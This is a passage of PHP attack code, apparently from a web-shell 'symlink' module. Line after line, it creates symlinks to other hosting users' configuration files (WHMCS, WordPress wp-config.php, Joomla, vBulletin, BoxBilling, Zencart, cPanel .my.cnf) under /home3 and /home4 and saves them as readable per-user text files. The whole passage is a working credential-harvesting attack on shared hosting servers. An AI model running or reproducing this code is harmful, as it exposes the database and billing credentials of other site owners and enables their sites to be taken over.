  1378. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1393. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1394. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1395. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1396. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1397. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1398. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1399. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1400. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1401. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1402. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1403. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1458. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1459. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1460. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1461. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1462. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1463. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1464. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1465. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1466. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1467. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1470. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1471. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1472. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1473. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1474. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1475. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1476. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1477. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1478. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1479. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1480. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1481. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1482. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1483. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1484. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1485. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1486. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1487. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1488. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1489. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1490. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1491. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1493. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1494. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1495. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1496. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1497. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1498. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1499. @symlink('/home3/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1500. @symlink('/home3/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1501. //Home4
  1502.  
  1503. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1504. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1505. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1506. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1507. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1508. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1509. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1510. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1511. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1512. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1513. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1514. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1515. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1516. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1517. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1518. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1519. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1520. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1521. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1522. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1523. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1524. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1525. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1526. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1528. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1529. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1530. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1531. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1532. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1533. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1534. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1535. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1536. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1537. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1538. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1539. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1540. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1541. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1542. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1543. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1544. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1545. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1546. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1547. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1548. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1549. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1635. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1636. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1637. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1638. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1639. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1640. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1641. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1642. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1643. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1644. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1645. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1646. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1647. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1648. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1649. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1650. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1651. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1652. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1653. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1654. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1655. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1656. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1657. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1658. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1659. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1660. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1661. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1662. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1663. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1664. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1665. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1666. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1667. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1668. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1669. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1670. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1671. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1672. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1673. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1674. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1675. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1676. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1677. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1678. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1679. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1680. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1681. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
